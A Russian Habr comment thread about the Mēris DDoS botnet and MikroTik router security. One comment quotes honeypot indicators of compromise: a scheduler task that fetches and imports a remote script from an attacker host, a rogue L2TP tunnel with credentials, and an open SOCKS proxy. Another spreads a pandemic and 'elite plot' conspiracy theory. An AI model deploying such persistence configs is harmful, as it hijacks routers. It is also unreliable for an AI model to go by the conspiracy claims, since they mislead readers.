Как стать автором
Обновить

Ботнет Mēris: расследуем крупнейшую DDoS-атаку в истории интернета

Время на прочтение7 мин
Количество просмотров94K
Всего голосов 138: ↑135 и ↓3+175
Комментарии148

Комментарии 148

А как читается это латышское название?

"мэрис", с ударением на "э"

"мээрис". Черта над гласной ("макрон" по-научному) в латышском — это знак долготы.

Почему бы владельцам заражённых роутеров не выдавать страничку "ваш роутер скомпромитирован". А то пользователи же и не знают даже, что кого-то дедосят.

И владельцам роутеров объяснить, как проверить- заражен он или нет?

Хотя, если MikroTik уведомлен об этом только вчера- решения пока скорее всего нет.

Почему бы и нет? За отдельную плату, разумеется.

а даже если и есть - у микротиков нет автообновления. Точнее, технически оно есть, но мне неизвестны публичные адреса для этого, там нужно что-то вписывать руками. Так что даже выпустив новую версию, если не заняться информированием обонентов о критическом обновлении, половина всех устройств получит обновление только через несколько лет..

Информирование абонентов в данном случае — отключение клиентов с вредоносным исходящим трафиком, это они сразу заметят ;)

Компания Яндекс посчитала трафик от вашего роутера подозрительным. Мы вас отключаем?

А компания Яндекс — мой провайдер, в смысле ISP?

О том и речь, что если Яндекс не мой ISP, то какое дело моему ISP до того какие проблемы я создаю Яндексу (насколько понимаю трафик генерируется не очень большой).
Поэтому, думаю, никакого отключения платящих клиентов не будет.

Айпишники ISPа в блеклисты улетят. Учитывая что сейчас везде динамические IP и NAT его это не обрадует.

Тогда встаёт вопрос - как микротик за натом оказался заражён в первую очередь?

Думаю, сейчас только энтузиасты делают монолитные вирусы, а профессиональные злодеи работают с комплексами. Купить у какого-нибудь другого ботнета возможность запуска нагрузки на компах пользователей - и вот уже есть выход на первые микротики за натами. Достаточно одного, чтобы выйти на остальные в ЛВС провайдера. Несколько стадий заражений и проникновений - вот и собран новый ботнет.

Да рассылкой спама тоже проблемы создаются чужим клиентам, но провайдеры бьют за это ссаными тряпками.

У меня микрот например стоит для выдачи ipv6 (v4 - даёт кинетик), ну и как резерв для в4 если основной пров сломается. Если его заблочит -- я это замечу не раньше чем отвалится основной пров, что бывает раз в год, когда автооплата не прошла.

Дык проблема решена — исходящей вредоносной активности нет, а пользуетесь ли Вы при этом зараженным девайсом — Ваше личное дело. Как сказал мой пров: у себя в квартире можете делать, что хотите, но если DHCP начнет раздавать адреса в общую сеть — автоматом бан ;) Это он на мой вопрос: а не переел ли уважаемый пров ухи, запрещая клиентам поднимать у себя DHCP? Кривовато запрет был сформулирован, а по словам прова, недели не проходит, чтобы какой-нибудь умник не воткнул его провод во внутренние порты своего роутера ;)
Одни фирму, занимавшуюся (звучит весьма иронично) системами безопасности, много лет назад (во времена лимитных тарифов на интернет, когда безлимит если и был, то в виде 128Кбит — 1000р) чисто случайно удалось проучить, т.к. после получения IP от их DHCP сервера народ в локалке начал тупо через них сидеть в интернете. На посты на их форуме вида «почините свою чертову СКС» они вообще не реагировали, а вот IP от них часть народа получала обычно быстрее, чем от провайдера (т.к. их офис с сервером был ближе, чем провайдерский). В итоге была знатная ругань между провайдером и фирмой.

Какой-то ламерский пров у вас - что мешает ему включить на всех своих портах DHCP Snooping или вообще резать весь исходящий трафик по портам DHCP?

Полагаю, ничего не мешает и так он и делает.

Ох, так давно не видел слова "ламер" и производных от него...

Прям ностальжи... спасибо.)

Честно говоря уже давно не встречал провайдеров у которых не было бы защиты от dhcp-серверов. В маленькой организации я такое ещё могу представить, но не у провайдера.

А кто говорил, что у моего нету? Наверняка есть.

Тогда ему тем более фиолетово как раздаётся DHCP.

У микротиков автообновление можно реализовать через скрипт и запускать его через планировщик заданий. Пример есть, кажется, на сайте с доками самого микротика. Но действительно это надо ручками, галочку поставить негде. Поэтому в сети до сих пор встречаются устройства с прошивками 5.хх

автообновление реализуется однострочным скриптом

UPD да, глупо было бы предполагать, что это до сих пор никто не написал ;))

А он заражен? Всмысле был взломан через дыру или посаны просто пароль не поставили.

Хорошая мысль, кстати.
А еще стоило бы как то ограничить продажу микротов "домохозяйкам".

Как вы предлагаете определять уровень квалификации покупателя?

По красным глазам и свитеру летом, с оленями.

Никак, я озвучил только свои мысли.

Навороченный прибор в руках хомяков, опасен как бомба. Что и подтверждается практикой.

Keenetic, как производитель роутеров бытового уровня, в прошивках версии 3.x ввел опцию "автообновление ПО". Сдается мне, в Mikrotik нужна такая же, и включенная по дефолту. Профессионалы её смогут отключить, конечно. Если найдут :).

Как быть если конфиг… замысловатый и обновление что-то где то сломает?
кстати а на какую ветку обновляем?
long-term? stable? testing? development?

По умолчанию - stable.

Вы же знаете микрот, если сегодня им отправили, в stable это появится через год

Чем не повод пересесть с микры на что-нибудь поинтереснее и посекьюрнее?

На чего, чтобы с завода шло с таким кол-вом плюшек и возможностей? Cisco или Juniper? OpenWRT просьба не предлагать, как и решения вида «поставить линукс и самому».

А в чем собственно проблема с Cisco или Juniper? Или даже Palo Alto или Fortinet? Цена кусается? Ну всё правильно - хочешь секьюрность плати. Не хочешь - юзай микру. Линукс - как вариант не плох, но с грамотно настроенным fail2ban. Придётся конечно изрядно попотеть пару ночей чтобы это работало хотя бы на "удовлетворительно", и однозначно придется чем-то пожертвовать в функциональности.

Именно, дорого. Микротик позволяет поиграть со «взрослыми» плюшками даже на совсем слабых девайсах.

...и тем самым вы "by default" соглашаетесь, что на вашей микроше в любой момент может прописаться зловред. Согласен, микротик может и не плох, если у вас Small-Business и дырявый раутер для вас норм. Но пускать микру в более-менее серьезный Enterprise, где из-за утечки данных есть вероятность пострадать финансово или морально - ну б его нафиг, трижды подумал бы.

Я точно также соглашаюсь, что на моей циске и джуне может прописаться зловред. Как и на моих серверах с Linux/Windows/FreeBSD/Solaris. Софт и железо без дыр — это как сферический конь в вакууме. Как говорят знающие люди: единственный безопасный планшет это силикатный кирпич.
П.С. В Сириос Бусинэсс защита обеспечивается не маркой одного устройства, а комплексом оборудования, софта, мер и т.д. Обосраться и слиться можно и с топовой циской, как и послать хакеров с крекерами в null на линуксовой машине с древним ядром.

микрот регулярно факапит на разных этапах. Я пару раз скатался за 200км, потом отключил "автообновление".

Ну, справедливости ради, представляете себе автообновление на Cisco или Juniper?

Проблема микрота не в том, что что падает в процессе обновления. Нет! Проблема в том, что падает то, что не заявлено в патч-нотисах! Например, при входе в раздел "wifi" микрот начинал делать потери пакетов в 50%. Строго на определенной stable прошивке. Как так?! На форуме было разбирательство 1,5 месяца, где люди доказывали что они не верблюды, прежде чем выпустили хот-фикс. Чего тут повторять? открываешь раздел настроек и получаешь кирпич....

Как вы предлагаете определять уровень квалификации покупателя?

Просто продавать устройства без defconf )

На следующий же день появится статья (возможно даже на хабре) "как настроить микрот" с кривейшим defconf, из которой юзер скопипастит все не глядя и запустит роутер.

Тут подсказали, что еще хорошо бы выпускать микротик без QuickSet'а.

Я честно говоря немного понимаю во всем этом, но микротики меня пугают. Тут недавно была статья с базовой настройкой, от которой у меня пропала охота его покупать. Я лучше по-старинке, люликс и iptables. Надеюсь это лучше, чем микротык в моих руках.

На самом деле в микротиках уже давно есть страница быстрой настройки, которая не сложнее того, что есть в тех же длинк.

Статьи про безопасную настройку микротиков на Хабре - это больше для параноиков.

НЛО прилетело и опубликовало эту надпись здесь

Как я понимаю страница базовой настройки - это главный враг самому существованию MTCNA.

Без страницы быстрой настройки я себе Nat уже не настрою ?

НЛО прилетело и опубликовало эту надпись здесь

А что не так с настройкой, которую генерирует страница быстрой настройки после полного сброса устройства?

НЛО прилетело и опубликовало эту надпись здесь

Так это про существующие. А я имел в виду ситуацию покупки нового устройства и первоначальной настройки

НЛО прилетело и опубликовало эту надпись здесь

Интересно. Надо репроверить. Особенно п1, так как у меня модель без WiFi. Спасибо.

Он не сложней любой cisco.

У меня стоит микрот, я очень доволен его гибкостью.

Я тоже купил себе по-факту. Реально крутая штука для дома. Но конечно не слишком интуитивоно после чистых OpenBSD или линуксов.

А еще стоило бы как то ограничить продажу микротов "домохозяйкам".

Вас бешеный принтер покусал?

НЛО прилетело и опубликовало эту надпись здесь

Я думаю, что все в конечном итоге придет к сертификации и продаже с уймой всякого добра только компаниям. А весь смысл был как раз в организации сетей малого бизнеса, но в малом бизнесе принято всех выкидывать в том числе и админов и вот через какое-то время результат настигает.

Был у меня опыт работы в одной компании где по началу даже файрвол не был включен и ничего люди работали и ничего не боялись. Правда история это не про Microtick.

И выдавать эту страничку на скорости 20-30 млн. запросов в секунду ботам, которые не будут её читать, но будут очень рады, что заставили сервер её сгенерировать? Отличная идея!

Боты, на сколько я понял, не странички грузят. А пользователям странички и так отдаются - просто добавить к ним надпись и ссылку на инструкцию по обезвреживанию.

Для того чтобы увидеть эту страничку пользователь должен обратиться к атакуемому серверу, а с учётом этого распределения мэрис

владельцы атакующих устройств далеко не пользователи ya.ru

Что, с вашей точки зрения, делают эти боты? Расскажите, пожалуйста.

НЛО прилетело и опубликовало эту надпись здесь

Атака не повлияла на работу наших сервисов, данные пользователей не пострадали.

Сегодня лежал yandex cloud(было не зайти в админку, 20 минут назад заработал), лежал наш виртуальный сервер на yandex cloud, также у нас свой bid manager ставок для yandex direct и ведется лог ставок рекламных кампаний - с 9 утра на большинстве кампаний в direct показывает нулевые ставки за клик.

У них сегодня с днс проблемы были. Читайте алерты.

Так вот проблемы по какой причине? Продолжалась атака?

Есть подозрение что проблемы с днс были из-за очередной атаки Роскомнадзора на здравый смысл и целостность сети.

Вчера писали что была дыра в безопасности устройств роскомнадзора, их хакнули и ддосили с устройств роскомнадзора на яндекс)) сегодня уже убрали все вчерашние новости и другая инфа)

А где их можно прочитать? У меня тож седни были проблемы с облаком.

Я тоже не нашел, после этого комента и в гугле поискал и в админке yandex cloud, нигде не нашел ничего.

Алиса: нет связи с Интернетом . . .

как интересно - снова микротик в ботнете, а поспрашиваешь знакомых - ни у кого проблем нет.

вам не стыдно такое распространять? давайте лучше циску в таком обвините - примеров можно навалить. так и напишите в заголовке "сервера яндекса под циской участвуют в ддос атаке".

У владельцев дырявых Микротиков особых проблем и не должно быть. Это задача владельца ботнета — сделать так, чтобы они ничего не заметили и не ресетнули роутер.

Да, данные от ваших знакомых, несомненно, весомее серьезной статистики!

Связана разделегация домена mynetname.net с этой атакой?

У меня неприятные ассоциации... IT-коронавирус? Болезнь и симптомы уже есть, ни носителя ни лекарства (патча) пока нет, никто ничегоне знаети даже не понятно, насколько это серьезно...

IT вакцинация нужна :)

Теперь понятно почему РКН блокирует всё подряд. С эпидемией борется !

Даёшь выход в Интернет по СМС и QR-коду! И разрешения выписывать по выгрузке из Пенсионного Фонда. С указанием цели доступа, на 60 минут в сутки.

(я надеюсь, понятно, что это ирония?)

IT-эвтаназия, скорее

отключаешь BTest и настроить Heighbor на все интересы кроме WAN вот тебе и народное лекарство!

Для пущего эффекта можешь еще порты закрыть от WAN

А есть ли хэши вредоносных бинарных файлов?

После таких заявлений, кто-то на хабре будет еще рекомендовать дырявый микротик ос?

НЛО прилетело и опубликовало эту надпись здесь
<irony>
Сотрудники службы безопасности Яндекса пользовались впс на яндекс.клауде и не пускали админов клауда к панелям, чтобы они не забанили, пока СБ сканит интернет.
И зря! Где это видано, чтобы компании типа яндекса сканировали Интернет? Не положено!
</irony>

Они написали, как: radar.qrator.net

Послушайте. Вот я - не домохозяйка, и могу забраться в свои микротики на предмет поковырять и что-нибудь проверить/отключить.

Но я не настолько их фанат, чтобы знать всю внутреннюю кухню RouterOS, и писать скрипты в командной строке по памяти, мне реально не досуг заниматься её изучением до уровня админа.

Все они у меня настроены без вывихов, максимум отключен Winbox

Я думаю, таких пользователей довольно много.

Поэтому был людейбы рад от людей знающих получить методы проверки наличия этой проблемы, включающий хоть что-нибудь кроме смены пароля.

Обновить сбросить, поставить другие пароли и перенастроить заново ведь может не помочь.

Винбокс в свое время просто отключали.

А что отключить сейчас, коль есть такая проблема?

Кажется ботнет растет за счет zero day уязвимости, и пока не совсем понятно где проблема. Для начала нужно перенести все стандартные порты на другие и закрыть доступ к микротику из вне. Если закруть доступ нельзя тогда сделайте простой port knock для открытия порта. Это минимальные действия что приходят в голову.

НЛО прилетело и опубликовало эту надпись здесь

не думаю что из-за неправильной настройки получилось подмять под себя 200 000 устройств. Явно есть дырка, давайте подождем ответа от самого микротика

НЛО прилетело и опубликовало эту надпись здесь

У вас есть на примете уже взломанные устройства? Можете сказать какие есть признаки того что у вас в микротике сидит ботнет Meris? Ну кроме того что открыт порт 5678.

НЛО прилетело и опубликовало эту надпись здесь

Проверил все свои около 200 микротов на предмет несанкционированного изменения конфигов, не нашёл ни одного.

Но 2 недели назад был на аудите у клиента, ему провайдер развернул WiFi сеть, в роли роутера поставил коммутатор CRS328, без дефолт-конфига, просто прописаны ипы и маскарадинг, всё, остальное пусто, фаер чистый, все службы включены, все доступы открыты, спасибо, хоть прошивку до последней обновил.

Ясное дело, заметил следы взлома:

  1. Загрузка проца 100% (хоть у коммутаторов процы и слабые, но всё же)

  2. Включен SOCKS4

  3. Включен Web-proxy

  4. Разрешены внешние запросы к DNS

Накатывание дефолт конфига, закрытие доступов и отключение SOCKS4, Web-proxy и DNS уронили нагрузку до 5%.

После смены доступов периодически за ним наблюдаю, признаков взлома не появляется. Делаю вывод - все беды из-за рукожопого отношения к работе.

НЛО прилетело и опубликовало эту надпись здесь

Сейчас кнокать, переназначать и закрывать делу не поможет и смысла в этом нет. Этим надо заниматься когда настраиваешь рутер. Input и Forward из WAN закрыты в defconf, а значит у 95 процентов пользователей. Но они в ботнете. Значит это zero day уязвимость в фаерволе или в обход фаервола? Единственное что сейчас может решить проблему: это update от Mikrotik, остальное бессмысленная имитация деятельности.

Ответ от Микротика по поводу ботнета: https://forum.mikrotik.com/viewtopic.php?f=21&t=178417

Если в двух словах то этот ботнет микротики которые были скомпрометированны в 2018 году и сейчас в микротике нет явных дыр в безопастности RouterOS - это подтвердил независымый аудит.

… что нетрудно, после быстрого взгляда на первую же диаграмму из поста: там не заметно превалирования до критично-уязвимых версий RouterOS, и объяснение этого от микротиковцев (апдейт накатили, а пароли не поменяли) также выглядит весьма натянуто…

"Атаки ориентированы на эксплуатацию RPS (подтверждено)" - поясните, пожалуйста. В статье не полностью разобрался.

Атакующие не:
1. Пытаются сделать огромный POST запрос
2. Использовать уязвимость в протоколах или ПО атакуемых машин
3. Открыть 100500 соединений и ждать
4. Забить трафик гигабитами в секунду.
5.… и т.д.

Вместо этого они пытаются сделать много-много запросов.

Вот эта статья о ддос вроде тоже ничего не дала, но гораздо лучше обезьян из сбера.

Странно, я ранее читал, что например Россия и Бразилия одни из крупнейших потребителей продукции MikroTik, а в США они не очень распространены. По приведённой таблице 42,6% зомби-хостов в США, в Бразилии — 2,8%, а Россия даже в топ не вошла. Впрочем в достоверности данных по распределению по странам уверенности конечно нет. Хотя в России MikroTik точно очень распространён. Значит опять «у них» скажут, что русские хакеры виноваты. А «у нас» скажут, что вокруг враги.
И я кстати ни разу не удивлюсь если окажется, что никакой уязвимости и вовсе нет, а все эти сотни тысяч микротов просто были криво настроены и торчали в интернет голым задом.

Для распространенности нужно учитывать сколько всего там пользователей интеренена в других странах и сколько в процентном отношении любителей микротика.

Например у нас 1000 челокек пользуется интренетом и из них 100 человек купили микротик, итого 10%. Распространенность 10%.

У них 10 000 челокек пользуется интернетом и из них 200 человек сидит с микротиком, это не в два раза больше, это всего 2% против 10%.

Я думаю, что там имелось в виду именно абсолютное количество устройств. Впрочем я не помню где я это читал и откуда вообще эти данные были.
Но в любом случае очень странное процентное распределение.

Комментарий из сообщества североамериканских операторов связи:

Mikrotik is a very popular router in small to medium ISPs, running, well, everything.

В приведённой таблице не микротики (и вероятно даже не зомби-хосты), а грубо говоря количество точек с активным TCP-listener на 5678 порту, ибо:

Возможно, Mikrotik и Linksys не единственные, но у нас нет другого выбора, кроме как предположить, что 328 723 – это и есть число хостов в активном ботнете.

Например, у меня рутер тоже 5678 портом наружу торчит, но ваш покорный слуга использует его для совершенно других нужд (порт то как бы для RRAC изначально), и у меня не микротик, но меня возможно тоже посчитали.

Странно, что сперва речь шла про комбинацию с портом 2000:

Однако конкретная комбинация порта 2000 с «Bandwidth test server» и порта 5678 с «Mikrotik Neighbor Discovery Protocol» почти не оставляет почвы для сомнений в наших выводах.

Но просканировали почему-то только на предмет открытости TCP 5678:

... мы решили проверить TCP-порт 5678 с помощью Qrator.Radar

А как вы их успеваете заблочить? Чисто из-за пайплайнинга, или что-то ещё есть?

Просто припустим большой ботнет начнет качать index.html. как их отфильтровать от пользователей?

И ещё вопрос, как дела предстоят с http2? Там будет атака хуже/лучше?

Не большой сторонник теорий заговора, но где-то проскакивала новость, что РКН "успешно" протестировал блокировку vpn сервисов. Совпадение?

Кроме того, мы направили всю собранную информацию в профильные организации.

А у этих профильных организаций, под которыми, видимо, понимаются борцы с DDoS-атаками, нет ли какой-нибудь ассоциации для координации усилий? Или каждый считает собранные блэклисты своим конкуретным преимуществом, и с другими в общем случае не делится?

Для тех, кто не понимает, что такое 20MRPS. Если каждый запрос (аммортизированно) - это порядка 200 байт заголовков и запроса, то речь идёт про примерно 40 гигабит осмысленного трафика с запросами на каждый из которых сервера должны ответить. Не пустого флуда, который на сетевом уровне режется на достаточно толстом оборудовании с малыми проблемами, а самого что ни на есть "живого" и напоминающего клиентский.

Вопрос: каким образом был получен график распределения версий RouterOS из статьи?

Каким образом я могу проверить свой роутер на зараженность?

Ответ разработчиков:

В частности, мы предлагаем отключить SOCKS и заглянуть в меню Система -> Планировщик. Отключите все правила, которые вы не можете определить. По умолчанию правил планировщика быть не должно, а SOCKS должен быть выключен.

Спасибо, Socks у меня отключен а в планировщике вообще ничего нет. Значит я в порядке?

На счёт вас не знаю, а mikrotik с высокой долей вероятности чумой не заразился :)

Тут требуется, фото. (На самом деле Вы задали вопрос, который интересновал и меня, я только пару дней как купил и поставил микротик)

Проверить:
- system->scheduler на наличие незнакомого плана (у моей honeypot это был план
name="U6"
interval=3m o
n-event=/tool fetch url=http://strtbiz.site/poll/7edc6ee2-154f-47f1-b430-07871f8e9c40
mode=http
dst-path=7wmp0b4s.rsc\r\n/import 7wmp0b4s.rsc
policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive
)
-
ppp->Interface на наличие незнакомого l2tp-клиента (мой вариант
name="lvpn"
connect-to=s71.leappoach.info
user="user5589762"
password="pass5589762"
)
- ip->socks ( enabled: yes
port: 5678
connection-idle-timeout: 2m
max-connections: 200
version: 4
auth-method: none)

Все пусто, спасибо!

спасибо

Вы мой герой! :)

Зацепился за слово Mēris, т.к сам из Латвии, открыл статью - а тут такое. Пользую hapac2, как узнать что я не в ботнете? Без ответа не усну :)

Открыт TCP 2000, но закрыт TCP 5678

Устройство взломано?

Яндекс недавно стал говорить, при поиске, что мои запросы похожи на автоматические. То ли действительно мой роутер к нему активно долбился, то ли ip попал в базу адресов с открытым 2000, а потому - подозрителен.

Как бы выяснить...

Открытый порт 2000 скорее всего означает, что на вашем микротике включен bandwidth test server. Если вас это смущает, его можно просто выключить.
НЛО прилетело и опубликовало эту надпись здесь

Как опознать что твой микротик взломан? Должны быть открыты порты 5678 и 2000? Если этого нет, значит все в порядке?

20 млн RPS — это самая крупная атака из известных за всю историю интернета.

20 млн запросов в секунду? Я правильно понял? И это самая крупная атака за всю историю интернета?! - Аж как-то смешно... Процессор 1 GHz способен обрабатывать миллиард операций в секунду. А 20 млн, мне кажется это нормальная рабочая нагрузка для поисковой системы, типа Google, а для Яндекса это по всей видимости - подвиг...

Вы сравнили запрос к сервису с базовой операцией на процессоре? :)

Я сравнил вычислительные возможности одного ПК с одной точкой доступа к интернету, с этой "дос.атакой тысячелетия" :) Например длина запроса "привед медвед" = 25 байт. Делим 1024 / 25 = 40,96 запросов в 1KB; Округляем до 41 и умножаем на 1024 = 41984 запросов в 1Мб * 100 = 4 198 400 возможных запросов длиной 25 байт в 100 мегабайтах. Сократите длину запроса до "null" (4 байта) и вы получите где-то 21,8 млн RPS.

Чтоб отправить 100Мб за секунду, нужна скорость интернета до 1 Гигабит и 1 ПК с обычным процессором. Никаких 200 000 устройств для этого не нужно. На сколько я знаю, в некоторых странах уже есть домашний интернет со скоростью 1Гбит/с.

Поисковые системы, такие как Яндекс, Google и др., просто обязаны иметь ширину канала гораздо больше, если они позиционируют себя глобальной поисковой системой.

Я бегло прочитал статью и не увидел время (продолжительность) предполагаемой DDoS-атаки. Возможно это было совпадение, и в какой-то момент в систему поступил 21 миллион реальных запросов. Сегодня интернетом пользуются около 4-х миллиардов людей... Поправьте меня пожалуйста, если я где-то ошибся.

мы в Яндексе собрали данные о 56 000 атакующих устройств

- по моему у вас система просто тупит :)

Ключевая ошибка в том, что вы запросы начали переводить в веса. В этом нет никакого смысла.

Но я по-прежнему надеюсь, что это просто троллинг такой :)

Ключевая ошибка в том, что вы запросы начали переводить в веса.

По вашему электрический сигнал не имеет размерности? Или это кто-то на электростанции игрался рубильником, отправляя нули и единицы на сервера Яндекса, и таким образом сделал досатаку?

Для общего развития:

Сигнал — материальное воплощение сообщения для использования при передаче, переработке и хранении информации.

Но я по-прежнему надеюсь, что это просто троллинг такой :)

По ходу это вы тролите людей своей статьёй. А админы (или хз. кто), делают карму людям XD И в таком случае, всё это танцы с бубном.

У меня есть старый hdd на 500Gb. Могу его сбросить с 5-го этажа.
Получается скорость передачи информации - 500 гигабайт в секунду!

Ребят, не верьте им. Это самый глобальный сговор в истории.

Вот уже Яндекс заговорил о кибератаках. Все по сценарию. Один и тот же фейк со Сбером (читайте новость на хбре недельной даности). Ждите переворот этой осенью.

Напоминаю что 2 месяца назад прошел всемирный киберполигон, на котором те же люди, которые стоят за короновирусом , запланировали кибератаки. Это аналог события 201 (читайте Википедию) на котором за 74 дня до пандемии они говорили о будущей "внезапной" пландемии....

Будет переход на единую цифровую валюту после этого и весь кавидный режим ужесточат!

И похоже не будет доступа к деньгам. Не будет света, интернета несколько дней и будут эвакуации людей в кавид лагеря.

Готовьтесь.

Неделю назад аналогичная кибератака "произошла" на Сбер. Греф, Мишустин, Шваб - участники кибеполигона.

Кто то ещё сомневается во всемирном заговоре элит?

Это самый глобальный фейк развод, ребят. И се с ужасным кавидом это все звенья одной цепи и кусочки одного пазла, кто до сих пор не понимает. Нас всех хотят поиметь этой осенью.

Яндек работает на правительство РФ. Аналгично как гугл работает на правительсво США. Читай на мировое правительство, закулисье.

Всем пора просыпаться.

Лучший комментарий треда.

НЛО прилетело и опубликовало эту надпись здесь

Чего и сколько?

Кажется замена классике подоспела

Ребята не стоит вскрывать эту тему. Вы молодые, шутливые, вам все легко. Это не то. Это не Чикатило и даже не архивы спецслужб.

Когда эта новость появилась - сразу побежал проверять свой микрот на наличие вот этих вот проблем. В итоге всё оказалось хорошо, но проверить никогда не лишне.

Не смотря на явные признаки отношения атаки к микротам, думаю справедливо допустить, что среди ботнетов есть огромное количество и других устройств. Не думаю, что только с микротами неосторожно обращаются, а различные кинетики до 2018 года выпуска тоже сами не обновятся, если им не сказать. Что и говорить, два года назад сам менял в одной бюджетной организации DIR-100 на микрот. Вот смех смехом, а мы думали их хоть какой-то админ обслуживает и меняет оборудование раз в N лет. Так что комментарии о том, что микроты не стоит нигде ставить, на мой взгляд, чистой воды предвзятое отношение. Хотя следует быть внимательным с этим изделием латвийского гения. Нет-нет, да найдётся какой-то небольшой баг, над которым потом голову ломаешь час.

Больше всего интересно, возможно ли определить центральный источник этой атаки? Очевидно, что за всем этим стоят живые люди, которые выявляют уязвимости, совершают взлом, дают распоряжение запустить использование уязвимости, да и нажимают нужную комбинацию клавиш для её запуска. Может быть есть и те, кто разработают методику поиска хотя бы части виновников?

К слову, помнится на хабре читал статью энтузиаста, который находил в интернете и исправлял эту самую уязвимость. Возможно, стоит связаться с ним и им подобным соответствующим инстанциям для помощи в решении проблемы на официальном уровне?

Зарегистрируйтесь на Хабре, чтобы оставить комментарий